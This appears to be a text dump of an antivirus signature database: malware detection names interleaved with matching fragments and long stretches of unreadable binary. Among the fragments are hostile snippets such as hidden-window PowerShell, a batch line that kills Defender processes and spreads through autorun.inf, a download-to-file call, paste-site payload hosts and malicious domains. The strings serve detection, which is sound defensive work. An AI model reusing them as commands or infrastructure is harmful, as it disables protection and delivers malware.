!#HSTR:JAVA:Feature:C:459 !#HSTR:JAVA:Feature:C:463 !#HSTR:JAVA:Feature:C:465 !#HSTR:JAVA:Feature:C:466 !#HSTR:JAVA:Feature:C:469 !#HSTR:JAVA:Feature:C:470 !#HSTR:JAVA:Feature:C:471 !#HSTR:JAVA:Feature:C:473 !#HSTR:JAVA:Feature:C:477 !#HSTR:JAVA:Feature:C:478 !#HSTR:JAVA:Feature:C:480 !#HSTR:JAVA:Feature:C:481 !#HSTR:JAVA:Feature:C:482 !#HSTR:JAVA:Feature:C:483 !#HSTR:JAVA:Feature:C:484 !#HSTR:JAVA:Feature:C:489 !#HSTR:JAVA:Feature:C:490 !#HSTR:JAVA:Feature:C:491 !#HSTR:JAVA:Feature:C:492 !#HSTR:JAVA:Feature:C:493 !#HSTR:JAVA:Feature:C:498 !#HSTR:JAVA:Feature:C:500 !#HSTR:JAVA:Feature:C:502 !#HSTR:JAVA:Feature:C:503 !#HSTR:JAVA:Feature:C:504 !#HSTR:JAVA:Feature:C:509 !#HSTR:JAVA:Feature:C:510 !#HSTR:JAVA:Feature:C:512 !#HSTR:JAVA:Feature:C:513 !#HSTR:JAVA:Feature:C:517 !#HSTR:JAVA:Feature:C:518 !#HSTR:JAVA:Feature:C:519 !#HSTR:JAVA:Feature:C:520 !#HSTR:JAVA:Feature:C:526 !#HSTR:JAVA:Feature:C:529 !#HSTR:JAVA:Feature:C:530 !#HSTR:JAVA:Feature:C:531 !#HSTR:JAVA:Feature:C:537 !#HSTR:JAVA:Feature:C:538 !#HSTR:JAVA:Feature:C:539 !#HSTR:JAVA:Feature:C:540 !#HSTR:JAVA:Feature:C:544 !#HSTR:JAVA:Feature:C:545 !#HSTR:JAVA:Feature:C:546 !#HSTR:JAVA:Feature:C:548 !#HSTR:JAVA:Feature:C:549 !#HSTR:JAVA:Feature:C:551 !#HSTR:JAVA:Feature:C:556 !#HSTR:JAVA:Feature:C:559 !#HSTR:JAVA:Feature:C:560 !#HSTR:JAVA:Feature:C:562 !#HSTR:JAVA:Feature:C:564 !#HSTR:JAVA:Feature:C:568 !#HSTR:JAVA:Feature:C:569 !#HSTR:JAVA:Feature:C:570 !#HSTR:JAVA:Feature:C:573 !#HSTR:JAVA:Feature:C:575 !#HSTR:JAVA:Feature:C:576 !#HSTR:JAVA:Feature:C:577 !#HSTR:JAVA:Feature:C:581 !#HSTR:JAVA:Feature:C:582 !#HSTR:JAVA:Feature:C:587 !#HSTR:JAVA:Feature:C:588 !#HSTR:JAVA:Feature:C:592 !#HSTR:JAVA:Feature:C:593 !#HSTR:JAVA:Feature:C:598 !#HSTR:JAVA:Feature:C:601 !#HSTR:JAVA:Feature:C:603 !#HSTR:JAVA:Feature:C:607 !#HSTR:JAVA:Feature:C:612 !#HSTR:JAVA:Feature:C:613 !#HSTR:JAVA:Feature:C:614 !#HSTR:JAVA:Feature:C:618 !#HSTR:JAVA:Feature:C:624 !#HSTR:JAVA:Feature:C:625 !#HSTR:JAVA:Feature:C:628 !#HSTR:JAVA:Feature:C:633 !#HSTR:JAVA:Feature:C:634 !#HSTR:JAVA:Feature:C:635 !#HSTR:JAVA:Feature:C:636 !#HSTR:JAVA:Feature:C:639 !#HSTR:JAVA:Feature:C:642 !#HSTR:JAVA:Feature:C:643 !#HSTR:JAVA:Feature:C:644 !#HSTR:JAVA:Feature:C:646 !#HSTR:JAVA:Feature:C:648 !#HSTR:JAVA:Feature:C:649 !#HSTR:JAVA:Feature:C:651 !#HSTR:JAVA:Feature:C:654 !#HSTR:JAVA:Feature:C:655 !#HSTR:JAVA:Feature:C:656 !#HSTR:JAVA:Feature:C:657 !#HSTR:JAVA:Feature:C:658 !#HSTR:JAVA:Feature:C:664 !#HSTR:JAVA:Feature:C:665 !#HSTR:JAVA:Feature:C:666 !#HSTR:JAVA:Feature:C:667 !#HSTR:JAVA:Feature:C:669 !#HSTR:JAVA:Feature:C:671 !#HSTR:JAVA:Feature:C:672 !#HSTR:JAVA:Feature:C:673 !#HSTR:JAVA:Feature:C:677 !#HSTR:JAVA:Feature:C:687 !#HSTR:JAVA:Feature:C:689 !#HSTR:JAVA:Feature:C:691 !#HSTR:JAVA:Feature:C:692 !#HSTR:JAVA:Feature:C:693 !#HSTR:JAVA:Feature:C:694 !#HSTR:JAVA:Feature:C:696 !#HSTR:JAVA:Feature:M:100 !#HSTR:JAVA:Feature:M:101 !#HSTR:JAVA:Feature:M:102 !#HSTR:JAVA:Feature:M:103 !#HSTR:JAVA:Feature:M:104 !#HSTR:JAVA:Feature:M:106 !#HSTR:JAVA:Feature:M:108 !#HSTR:JAVA:Feature:M:109 !#HSTR:JAVA:Feature:M:110 !#HSTR:JAVA:Feature:M:111 !#HSTR:JAVA:Feature:M:112 !#HSTR:JAVA:Feature:M:113 !#HSTR:JAVA:Feature:M:116 !#HSTR:JAVA:Feature:M:117 !#HSTR:JAVA:Feature:M:120 !#HSTR:JAVA:Feature:M:121 !#HSTR:JAVA:Feature:M:122 !#HSTR:JAVA:Feature:M:123 !#HSTR:JAVA:Feature:M:124 !#HSTR:JAVA:Feature:M:125 !#HSTR:JAVA:Feature:M:127 !#HSTR:JAVA:Feature:M:137 !#HSTR:JAVA:Fea ^ia-a/- T]/3 y45D<[ 8 A_' +'E0-N\" Lu-Z ig!b}g cP-W) UPuXW & z?t+a` \"Lj9N 7<\"Cl3I 6us 3r ={^\\6i |zXqcF #1PlYgl `pg[A \"z87< 1(PZVN U8[[aZs iV(S #&:=9 b-d%Y ]Mb/lh to)>T WB09F O!as7 q(.c> Sm8,@ =mTXci6 !'A ]QA d{q$2> ' ;)\" a&TnV QT,IF$c Rxh=$ sfice \"Zs[': sS@%k LGM@C q0Db t_<~a k~X\th wcM . vV^di@d FI_9J$ elQ6f< kV-7+ GI//lC J-+T6 e}jMDZ[ P: CK oUSeT H(RF^YT@ pfaN0 I_=%i w7<3V q$}et[ Yk$-[\tvLQ O,b-H $+MbQy&f sf4N1up ~j*4i= QXDu64W n!N.ITX rJ~5{dS xdH-\td vF Seb @+<-# Ma93B Dv\\u| O~yt: RF}*6a L}SXR9/ u3g&g Pogg& Pogg&g lLEg& lLEg&g uOg&g `!Ll# `!Ll#g ?5g&g }p0g& }p0g&g DLaHg A?g&g CN\\)O CN\\)Og S!g&g <;g&g 8S@eg 94)_g @OaZg gb)fg qO\\g& qO\\g&g m~x7g 6 g&g 8cDg& 8cDg&g V1l#g K+g&g 2)g&g r/)6g _=wa< _=wa<g u|g&g *[xpg fleck/ \"W\"+\"S\"+ \"W\"+\"S\"+ , \"http\" + , \"http\" + !#SCPT:JS/Obfuscator.Radix36.D 2j0y2r2w2p361v332s2t1t380y2l =\"c\", !#SCPT:JS/Obfuscator.CharCode.A [\"charCodeAt\"] /) & 0xff]; G\"!#SCPT:JS/Obfuscator.LongVarName.B function G\"!#SCRIPT:Java/AdwindOddClassName.D _DecryptServer.classPK #!#SCPT:JS/Obfuscator.Capslock.var.A G#!#SCPT:JS/Obfuscator.Capslock.var.A var A 0-9A-Z; var B var C G#!#SCPT:JS/Obfuscator.Split.concat.A \"c\"+\"o $!#SCPT:JS/Obfuscator.Spaced.Format.A G$!#SCPT:JS/Obfuscator.Spaced.Format.A ) ; } } catch ( G$!#SCPT:JS/Obfuscator.Split.getYear.A getY\"+\"e (!#SCPT:JS/Obfuscator.functions.asindex.A G(!#SCPT:JS/Obfuscator.functions.asindex.A 0-9a-z()); (!#SCPT:JS/Obfuscator.functions.asindex.C G(!#SCPT:JS/Obfuscator.functions.asindex.C \"][1][ 0-9]](); \"][2][ \"][3][ \"][4][ \"][5][ \"][6][ \"][7][ \"][8][ \"][9][ )!#TrojanDownloader:PowerShell/Ploprolo.K3 G)!#TrojanDownloader:PowerShell/Ploprolo.K3 //:ptth'; G*!#SCPT:Win32/Obfuscator.BASE64.ShellCode.A ///WaACAAABT/3UI /9ZoAIAAAFP/dQj/ G,!#SCPT:JS/Obfuscator.Split.InnerAssignment.A +='Script ] = ' if( ] = '.Run ] = 'Run( ] = '}; } /!#SCRIPT:Exploit:SWF/NeutrinoEK.C.ClassMainName G/!#SCRIPT:Exploit:SWF/NeutrinoEK.C.ClassMainName KCS___Main 0!#SCPT:JS/Obfuscator.BASE64EncScript.iCipherBy.A G0!#SCPT:JS/Obfuscator.BASE64EncScript.iCipherBy.A aXBoZXJCeQ ,MainSection 6AAAAABZSYnISIHBUwQAALpFd2IwSYHA \"6AAAAABZSYnISIHBUwQAALpFd2IwSYHA !#SCPT:VBS/SleepUntilLoop.A WScript.Sleep( \" ) Loop Until 'Ac' + !'Ac' + ('iv' !#SCPT:JS/Obfuscator.Substr.A { return this.substr(0, 1); }; { return this.substr(0, 1); }; powershell -nop -w hidden -c !#Exploit:O97M/DDEDownloader.E1 \\'44\\'44\\'45\\'41\\'55\\'54\\'4f _e_-_-_-- @freerunner @freerunner@ !#SCPT:Trojan:Python/Queri.D.EC1 H !#SCPT:Trojan:Python/Queri.D.EC1 #!#SCPT:JS/Obfuscator.Capslock.var.B H#!#SCPT:JS/Obfuscator.Capslock.var.B 0-9A-Z + H#!#SCPT:JS/Obfuscator.Split.length.A \"len\") H$!#SCPT:JS/Obfuscator.Split.replace.A re\"+\"p H&!#BRUTE:Exploit:Python/CVE-2017-0143.7 SESSION_SECCTX_OFFSET *!#SCPT:VBS/Obfuscator.ChrArrayBASE64Like.A H*!#SCPT:VBS/Obfuscator.ChrArrayBASE64Like.A +chr(61)+chr(61)) H,!#SCPT:JS/Obfuscator.Split.InnerAssignment.A +='WScript ] = ' catc ] = '} cat H-!#SCPT:JS/Obfuscator.Redundancy.EmptyQuotes.C ['' + (' .!#SCPT:PossiblyClean:Andy_Ful.LegalCopyright.A H.!#SCPT:PossiblyClean:Andy_Ful.LegalCopyright.A * Andy Ful , /!#SCRIPT:Exploit:SWF/NeutrinoEK.C.ClassDataName H/!#SCRIPT:Exploit:SWF/NeutrinoEK.C.ClassDataName _el_-___--_ !#SCPT:BelmontHE ERROR: Cannot initialize some internal data. .ERROR: Cannot initialize some internal data. DO NOT ALTER ANYTHING BELOW THIS LINE ! )DO NOT ALTER ANYTHING BELOW THIS LINE ! !#SCPT:PDF/PDFPhishURI.A /po/index.php) &/po/index.php) ar _0x $ar _0x !#ALFPER:PWS:HTML/LotusBlue.A >Welcome to Lotus-Blue Toolkit< !>Welcome to Lotus-Blue Toolkit< !\"GE\" + , \"http:/\" + , \"http:/\" + !#SCPT:JS/Obfuscator.Radix36.F 1t2r382x3a2t2g272q2y2t2r38140y 1t2r382x3a2t2g272q2y2t2r38140y could not find regexp address. could not find regexp address. 5E3C5E 51555E !#SCPT:JS/Redundancy.Comments.B );} /* !#Exploit:Win32/CVE-2015-0097.A3 I !#Exploit:Win32/CVE-2015-0097.A3 <script language=javascript> I!!#SCPT:JS/Obfuscator.Juxtaposed.B I!!#SCPT:Java/DOSReservedDevNames.A main/???????????nUL.classPK I!!#SCPT:Java/DOSReservedDevNames.B main/???????????aUX.classPK I!!#SCPT:Java/DOSReservedDevNames.C main/???????????CON.classPK I#!#SCPT:JS/Obfuscator.Split.concat.A 'co'+\"n #!#SLFPER:Exploit:HTML/Belmont.M!dha I#!#SLFPER:Exploit:HTML/Belmont.M!dha <script src=\"/sbxjs?main\" $!#SCPT:JS/Obfuscator.Split.hex.var.A I$!#SCPT:JS/Obfuscator.Split.hex.var.A $!#SCPT:SWF/ObfuscatorLikesecureSWF.A I$!#SCPT:SWF/ObfuscatorLikesecureSWF.A 521423132326123423632234 I,!#SCPT:JS/Obfuscator.Split.InnerAssignment.A +='\"WScript .!#SCPT:JS/Obfuscator.Enc.Xorbyte.hex.ActiveX.A I.!#SCPT:JS/Obfuscator.Enc.Xorbyte.hex.ActiveX.A 00223528372419 01233429362518 0220372a35261b 0321362b34271a 0426312c33201d 0527302d32211c 0624332e31221f 0725322f30231e 082a3d203f2c11 092b3c213e2d10 0a283f223d2e13 0b293e233c2f12 0c2e39243b2815 0d2f38253a2914 0e2c3b26392a17 0f2d3a27382b16 10322538273409 11332439263508 1230273a25360b 1331263b24370a 1436213c23300d 1537203d22310c 1634233e21320f 1735223f20330e 183a2d302f3c01 193b2c312e3d00 1a382f322d3e03 1b392e332c3f02 1c3e29342b3805 1d3f28352a3904 1e3c2b36293a07 1f3d2a37283b06 20021508170439 21031409160538 2200170a15063b 2301160b14073a 2406110c13003d 2507100d12013c 2604130e11023f 2705120f10033e 280a1d001f0c31 290b1c011e0d30 2a081f021d0e33 2b091e031c0f32 2c0e19041b0835 2d0f18051a0934 2e0c1b06190a37 2f0d1a07180b36 30120518071429 31130419061528 3210071a05162b 3311061b04172a 3416011c03102d 3517001d02112c 3614031e01122f 3715021f00132e 381a0d100f1c21 391b0c110e1d20 3a180f120d1e23 3b190e130c1f22 3c1e09140b1825 3d1f08150a1924 3e1c0b16091a27 3f1d0a17081b26 40627568776459 4260776a75665b 4361766b74675a 4466716c73605d 4567706d72615c 4664736e71625f 4765726f70635e 486a7d607f6c51 496b7c617e6d50 4a687f627d6e53 4b697e637c6f52 4c6e79647b6855 4d6f78657a6954 4e6c7b66796a57 4f6d7a67786b56 50726578677449 51736479667548 5270677a65764b 5371667b64774a 5476617c63704d 5577607d62714c 5674637e61724f 5775627f60734e 587a6d706f7c41 597b6c716e7d40 5a786f726d7e43 5b796e736c7f42 5c7e69746b7845 5d7f68756a7944 5e7c6b76697a47 5f7d6a77687b46 60425548574479 61435449564578 6240574a55467b 6341564b54477a 6446514c53407d 6547504d52417c 6644534e51427f 6745524f50437e 684a5d405f4c71 694b5c415e4d70 6a485f425d4e73 6b495e435c4f72 6c4e59445b4875 6d4f58455a4974 6e4c5b46594a77 6f4d5a47584b76 70524558475469 71534459465568 7250475a45566b 7351465b44576a 7456415c43506d 7557405d42516c 7654435e41526f 7755425f40536e 785a4d504f5c61 795b4c514e5d60 7a584f524d5e63 7b594e534c5f62 7c5e49544b5865 7d5f48554a5964 7e5c4b56495a67 7f5d4a57485b66 I0!#SCPT:JS/Obfuscator.BASE64EncScript.iCipherBy.A aUNpcGhlckJ5 !#BRUTE:JarFileObfuscated.A Obfuscation by Allatori Obfuscator $Obfuscation by Allatori Obfuscator !#Exploit:SWF/Korpode.A.frag2 DRMOperationCompleteListener \"DRMOperationCompleteListener !#SCPT:Backdoor:Win32/Plugx_L !#SCPT:HTML/Phish.ElementId.A .getElementById(\"homescreen147\") \".getElementById(\"homescreen147\") = [ \"= [ ', + \"E\" + \"+ \"E\" + !#SCPT:JS/Obfuscator.LongName J !#SCPT:JS/Obfuscator.LongName g V5c E= AP c(mUOC [N>[:m y UBr 5y&'; @v)9FwZ e*O[. Q[PE& s )p) K1@rI 08PLd :Qj_rk DKqrc 0b[NXy <0eG% 7WZ]bT AtSbA !|)kI 7[f8&e _h>= u uC lpK|l QN/%L~ [\"V_b1 \\6/pt A@6?g i:Nl, oX'UGY zXO@Q XS,KOv \"?f^j o$&uz= z}Gj`M y3| hT Ik3qA 8?7~6 mC;ec D}~{Z *9Ecw M'$`P! bO< W1L| \"`k(& e$('\t cL=6 8DQ<s %?2 {& 6H'p@ 8@`U5 m$hu2z \"FH R 6\t@vR} MMC|U w. r%,Gc )J@}= :Tojd _$\t/~ +6;'*) ygWa. .1Uv< y2uX;V \"P ml* j{jhfd ZV[PA P4 !\"'[ ytR# s\"Rsh3> l9KWo% dda/]Z mb-nIT ur^RpmT TVm=5 ?IN2I *e+*y BXINy @ JpB \"+tSIl FHdt4 'BqBc \"W9o2 QAvpH TLm+Qt ~2WkFO p>j'2 ]H+e5 (UMZ~ Sy'9C /ML9 PiS\\H F01R /OiFu <T\tk dnxF1 gNF%r( N&'H~ ymrV, {>dEj`0 1Lji\t W\"QBp bk3D h RXMYo a@I)| r6@c, e=3(O |]B1y:A_^3* f00''K 2.+}Y ]`_&B R!]f/ 6Y/B\" 3n_`{ nT0fE rB F \tRyf+K y(KKr a+6D 3R l0y u|rs9I \"Z@'rK( A;|9> ^V4NY :9\"R, q|2?% <v%R;H qzgQi+ T8a4h; &<-*u{ 8lPux y/w[7 !Agent.S !Agent.VZ !Bagle.MK !Bagle.ML !Bagle.MM !Bagle.MN d]VT] 5Bagle.MO 5Bagle.MP !Tibser.N !Agent.ABT !Lager.AD !Small.YN !Agent.ABU !Ldpinch.TX WX6{I! !Small.YU !Small.SA !Goldun.BO !Goldun.EP !Small.SX 5Bagle.MQ !Bagle.MR 5Bagle.MR 5Bagle.MS !Bagle.MS 5Bagle.MT 5Bagle.MU !Small.SW !Harnig.BN !Harnig.BO !Harnig.BP !Harnig.BQ !Harnig.BR !Small.SU !Small.SV !Tibs.E !Harnig.BS !Harnig.BT !Small.AGS !Agent.DS !Agent.DT 5Agent.DU 5Agent.DW !Harnig.BU !Harnig.BW !Harnig.BV !Lowzones.GO !Agent.WA !Agent.WB !Ldpinch.TY !Agent.WC !Agent.WD !WinShow.gen!A !WinShow.gen!B !WinShow.gen!C !WinShow.gen!D !WinShow.gen!E !Small.XD !Agent.FE !WinShow.gen!F !WinShow.gen!G Killav for%%xin( Hfor%%xin( docopy/yautorun.inf%%x:autorun.inf kill/f/imnod32kui.exe taskkill/immsseces.exe/ftaskkill/immsseoobe.exe/ftaskkill/imconfigsecuritypolicy.exe/ftaskkill/immpcmdrun.exe/ftaskkill/immsmpeng.exe/ftaskkill/imnissrv.exe/fexit 3g&~e !Agent.WE !Agent.DU !Goldun.EQ !Agent.WG !Adload.S !Conhook.A o NSZ w.`U< @S>w6e SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ShellExecuteHooks\\\\{20d57a66-f7df-467d-907b-9b7f4a118ab7} lSOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ShellExecuteHooks\\\\{20d57a66-f7df-467d-907b-9b7f4a118ab7}cr SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ShellExecuteHooks\\\\{ea32fb3b-21c9-42cc-b8ef-01a9b28edb0d} lSOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ShellExecuteHooks\\\\{ea32fb3b-21c9-42cc-b8ef-01a9b28edb0d}] !Goldun.M !Small.EQ !Goldun.O !Goldun.P !Goldun.ER !Ldpinch.TZ QJQ p !Agent.WH !Adload.T !Goldun.ES !Agent.EP !Agent.ER !Agent.ES !Agent.WI !Small.gen!A !Small.gen!B SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\shel 3SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\shelklop c:\\tskmgr.exe +urlmon.dllURLDownloadToFileAc:\\tskmgr.exe /2.exe !Small.gen!C !Adload.U !Adload.V !Adload.W !Adload.X +<1%X !Adload.Y !Adload.Z !Adload.AA !Adload.AB !Adload.AC !Adload.AD !Adload.AE !Adload.AG !Adload.AH !Adload.AI !Agent.IN eM0z !Adload.AF !Adload.AJ !Agent.IO !Renos.C 1Zlob !Zlob.gen!dll L$(QP !Harnig.gen!rpf !Adload.AK !Adload.AL !&VFo 1Ranky shed Proxy-agen YSSSSSSSj VVVVVVVj /a.php? HTTP/1.0 200 Connection established #HTTP/1.0 200 Connection established registerserviceprocess Proxy-agent: %d.%d.%d.%d AutoUpdateMgr /b.php? %s:*:Enabled:% %s:*:Enabled:%] +Zlob Killav.ET !Bagle.NA !Bagle.MV !Bagle.MW !Bagle.MX !Bagle.MY !Bagle.MZ !Agent.WJ !Agent.BN !Agent.BO !Lager.AE F:JASYP:TrojanDownloader:Win32/Upatre!atmn !#JASYP:Backdoor:Win32/Hupigon!atmn 0 c:\\temp\\ixp .tmp\\tmp $.tmp !#ALF:JASYP:Backdoor:Win32/IRCbot!atmn 0Y}8m export hkey_local_machine\\system\\controlset \\services\\srservice c:\\windows\\ trickler t:3f d9 s:51bf !#ALF:JASYP:Rogue:Win32/Winwebsec!atmn /c taskkill /f /pid & ping -n 3 .1 & del /f /q \"c:\\myapp.exe\" & start c:\\documents and settings\\johndoe\\local settings\\application data\\ !#NRI:WebServiceShareBins.A upaste.me paste.ee pastecode.xyz heypasteit ghostbin.co privatebin. skidbin. githack. %c:\\program files\\java\\jre \\bin\\uf !#ALF:JASYP:PUA:Win32/InstallIQ!atmnm c:\\temp\\pkg cd3e50\\ cd3e50 \"c:\\myapp.exe\" /wrapper /dir=\"c:\\temp\\pkg 044\"c:\\myapp.exe\" /wrapper /dir=\"c:\\temp\\pkg cd3e51 \"c:\\myapp.exe\"\" /wrapper /dir=\"c:\\temp\\pkg cd3e5 !#ALF:JASYP:Trojan:Win32/Ramnit!atmn o@a& E0 o@a& E0 fj 0 .temp !#ALF:Trojan:Win32/BATtoEXEAdvancedConverter p\"'61 0=2$ c:\\windows\\system32\\cmd.exe /c if exist .c:\\windows\\system32\\cmd.exe /c if exist \\temp\\ytmp\\tmp .bat\" del .exe\" del c:\\temp\\ytmp\\tmp !#ALF:TrojanDownloader:MSIL/Ursu.SIBA!MTB r`;https://cdn.discordapp.com/attachments/ 0/svchost !#ALF:JASYP:Trojan:Win32/Ymacco!atmn .tmp\" --pingc:\\temp\\ .tmp\t00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 !#ALF:JASYP:Trojan:Win32/Salgorea!atmn !#NRI:Dirtvantitufo.20210830 p&//bank4america.com p$.bank4america.com p //boldhamia.com .boldhamia.com p*//corporation-bf.com p(.corporation-bf.com p$//spectrummel.com p\".spectrummel.com !#ALF:JASYP:Trojan:Win32/Ymacco!atmnm \\c4e8d0e d42b7bea76bf9589bb111_logfile.txtc4e8d0e d42b7bea76bf bb111_logfile.txtc4e8d0e logfile.txt !#ALF:JASYP:Worm:Win32/Regul!atmn !#NRI:Dirtvantunion.20210830 p //finconsult.cc .finconsult.cc p,//headway-consult.com p*.headway-consult.com p&//realmetaldns.com p$.realmetaldns.com p$//universe-dns.me p\".universe-dns.me !#ALF:JASYP:Trojan:Win32/Qhost!atmn E0 fj !#NRI:HasResponseTCPNonCommonPort.A !#//SIGATTR:LOADSDECRYPTDROPSEXEC:JS/Nemucod 0$var ;(function(){function !#ALF:JASYP:Trojan:Win32/Cobra!atmn .tmp\t00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 #5|`r #YsPb :1{AF t+bl(M{ GQMH[% Fm}WS TE%wG L#WQI ~M>qr ~\"{ni X9]cc Owm3 /^H&+ a;~!$ -cJ-K% .XP<& Q/ \\] p\tKX& :/.E/ DS'FD r7CRZ& `R,h1 ^Z.T G UA J` jMjM4 QG<48 S|\"H-:' /2jOYvv {'hyF [#h(p p/P95ol# 0d4%.u A&[ Vt, m-<BO Cxr|m .x>Z? ld}`P pCou> kIihDGj4 $+; - Uw APGC 9'mWGBwm x*\"z< Vi?T: E[3%Sg IZ0gc ]K5)~/ U`CK} 7ro7pj *imL* R,a BHW @;$y\" -jsaw ?8{x. pGhH+ n9SU+| xMo`m>\" GulA> rGulA> \t__}7 r\"o?w r\"o?w T$[tDc r$WZ r$w1U r$w1U r%87 r&s0LT r&s0LT r.M> YBFvqj3R r/7sT r/7sT r/<99 r/<99 TW`t] oF ?g o,u u 4l{^/.p.F r9[b r;o! d/orY; r@1- rAC. f;\t0p rBWi rD47 rE<\\c7 rE<\\c7 BD<r'B3 wcS7)l rN\\ Oz rN\\ Oz rNrF rNrF rO%I~ rO%I~ rOP8 rR` rU;E rYwm. rYwm. $z!o6Z rZgQ plwb? X%1bzE <T)qH{ r[G]6 r[G]6 r^%+ r_$Me r_$Me r_o% ral2 870Ww rdO\ts rdO\ts <n,Ol \"[tDw ri1}a ri1}a B2*QA l{|:i ro=i rqKU rrwGs rrwGs Xi~]# A^y$+ Fq=br j]?TU rw<4j5c rw<4j5c rxkX KuGLH MUkMxuf6d4p rz)e *:E-[n rzgO (2W'? n#ri, t^*xAM ;Z \\^ 2>6MM _!Fl} QlU_/ \\ihA;2 W=s%Q O=H(d ;BfXn #>CT +lfDB# 'Em=w >)I^H \tBm=+ 61T|LR 3j^[s fw'Lp Rliq; ,GeiH ]\t=\\]\t LXAP: }@Gx qY5]6 _irN?]^ U^^ 7 !tf5B \twB<A NuXsY +9~n_ 86N99 R84]3 Gy*F{ SR$)N K3jQY \\$j{$ w|%O! u`md?% g'F0\"c c2\"yN XSVJ/:{ c9zb(> u6(fe T^!,? _nD~t [_B8r 6VFF} !\\je0Z &+b#c %5V|f h0y4#Js y`DQ/ SOYS' e0B1{~ ^)}f7 `~}FGQ jj@#x _\"9\t$H \\VtDG~ \\;b!= lR@-mi o4$cJ \"\"Hy ?(im\\ \"&q DNv~O. \"(:xq \"(:xq u^<+5 \"+rx 6f#&LP \"8?[d \"8?[d \">.b \">Q\\2y \">Q\\2y \"?2Q* \"?2Q* \"@Us bmf25z SwQx+ \"DJ| \"DLF XDa^P^` erebg \"FM~ EG_a$ \"HVd:rl3 \"HVd:rl3 \"I#p \"Ipuz \"Ipuz \"JrA nk\tHNE 6/qk_ : a%*?E \"Jtj $@-4? \"NWJ \"N}A \"PNk \"QbN? \"QbN? 6fEJ 7Ah3up \"T_l *]*>r H \"VyR \"\\v? \"]O~: \"]O~: \"]x$i \"]x$i :1O\"^ GA==<6/ \"aTz KKNr$. \"d{2q* \"d{2q* \"eG6 NMJ B \"k}$J \"k}$J YtpF( \"mLh \"nSE h#_,b \"tIb^ \"tIb^ \"tho<9& \"tho<9& pPz=N \"wy| stop-service-name !#SCPT:URL.B!js !#SCRIPT:Cond.1 .status_code==401 !#SCRIPT:base64 base64DecodeChars base64EncodeChars !#SCRIPT:esents drivername=esents !#SCPT:JS:Frag.1 function(jquery) !#SCPT:PyFlashAQ errorjso parse !#SCPT:PyFlashAX id=%sda e=%s%s !#SCPT:Scryper.B =\"23.95.215.100\" !#SCPT:Scryper.C functionskype(){ !#SCPT:TokenInfo get-primarytoken !#SCPT:VBSScared e66eaba29196e06d !#SCRIPT:Trick.B https !#SCRIPT:XL4Exec <f>exec( !#SCRIPT:coredsp web/core.dsp.tld !#XmlComplexType <xs:complextype> !#SCPT:ActDirNetC dclist !#SCPT:EXPSEQ_2.B 0xffc339facb3ba !#SCPT:EXPSEQ_3.D 0xd98acaa029839 !#SCPT:Neptuner.D defsendsuplinit !#SCPT:XML/UrlChk </f><v>https:// !#//XLSM:NtdllCall <f>call(\"ntdll !#SCPT:BadBuild.A2 optionalheader !#SCPT:BadBuild.A4 virtualaddress !#SCPT:Beafpwner.A frompwnimport* !#SCPT:ChromeVer.B \"88.0.4324.79\" !#SCPT:ChromeVer.C \"88.0.4324.68\" !#SCPT:ChromeVer.F \"87.0.4280.86\" !#SCPT:ChromeVer.G \"87.0.4280.66\" !#SCPT:Thinblood.2 log.events.vc0 !#SCPT:Thinblood.3 log.access.vc0 amsiinitfailed amsiscanbuffer amsiscanstring !#SCRIPT:WordPress /wp-snapshots/ !#SCRIPT:XL4Export registerserver !#Worm:VBS/Jenxcs1 functioned64it !#Worm:VBS/NtMaas2 foreachfieldin !#MacOS_DarthMiner4 curl-o !#SCPT:/Poisonshell /*poisonshell !#SCPT:Nemucod.ret1 {return'resp' !#SCPT:Nemucod.ret3 {return'xa.o' !#SCPT:PEParsing.AE +0x3c +0x78 !#SCPT:PEParsing.AF +0x88 !#SCPT:PEParsing.AJ =0xe9 =0xe8 !#SCPT:PEParsing.BB =find base( !#SCPT:PEParsing.BD !#SCPT:PSNetDisc!nu net1.exe user !#SCPT:PSUserDisc!u $env:username !#SCPT:PageLanguage pagelanguage= !#SCPT:ServmoopsA.A got sessionid !#SCPT:ServmoopsA.B got csrftoken !#SCRIPT:Psrtlmov.A !#SCRIPT:htmldecode htmldecode.js !#AllowList:AMSIVBS1 taniumclient !#BRUTE:JAMSI:ComN:2 _stream file>>stream !#SCPT:Nemucod.AAI10 \"].pop();var !#SCPT:Nemucod.GET.2 \"g\\x45\"+\"t\"; !#SCPT:PSProcDisc!qp queryprocess !#SCPT:PSUserDisc!qu !#SCPT:Sessington.AD escript_base !#SCPT:VBSSmallArray (10)= !#SCPT:XML/ShellExec !#SCRIPT:FileExecRel !#SCRIPT:ImportJavax importjavax. !#SCRIPT:JsDropLnk.E .targetpath( !#SCRIPT:NetShDiscov get-smbshare !#SCRIPT:Ruby_Code.D require' !#AnalysisProcName.A7 !#AnalysisProcName.A8 sbiesvc.exe !#AnalysisProcName.B5 petools.exe !#AnalysisProcName.B8 httplog.exe !#AnalysisProcName.C2 pr0c3xp.exe !#AnalysisProcName.D8 !#AnalysisProcName.D9 bindiff.exe !#AnalysisProcName.E2 procmon.exe !#AnalysisProcName.E5 tcpdump.exe !#AnalysisProcName.F1 regshot.exe !#AnalysisProcName.F2 dumpcap.exe !#AnalysisProcName.G1 filemon.exe !#BM_SdbRedirectEXE.A redirectexe !#BRUTE:JAMSI:ComN:16 shell3 !#BRUTE:JAMSI:ComN:57 idrive !#BRUTE:JAMSI:FuncN:4 .writetext( !#BRUTE:JAMSI:FuncN:6 .writeline( !#BRUTE:JAMSI:FuncN:9 .workbooks( !#PUA:MacOS/Pirrit.G2 v/pd-logger !#SCPT:HTML/Phish.S10 \\/proc.php? !#SCPT:JS/Belmont.ZD3 yrarbildaol !#SCPT:eMailMessageID message-id: !#SCRIPT:AutoItNoTray net.exeview !#SCRIPT:SuspProcEnum get-process queryuser - 'ss_+mest' !#BRUTE:JAMSI:FuncN:18 .username( !#BRUTE:JAMSI:FuncN:36 .skipline( !#BRUTE:JAMSI:FuncN:44 .setproxy( !#BRUTE:JAMSI:FuncN:46 .sendkeys( !#BRUTE:JAMSI:FuncN:60 .regwrite( !#BRUTE:JAMSI:FuncN:64 .readtext( !#BRUTE:JAMSI:FuncN:65 .readline( !#BRUTE:JAMSI:FuncN:70 .position( 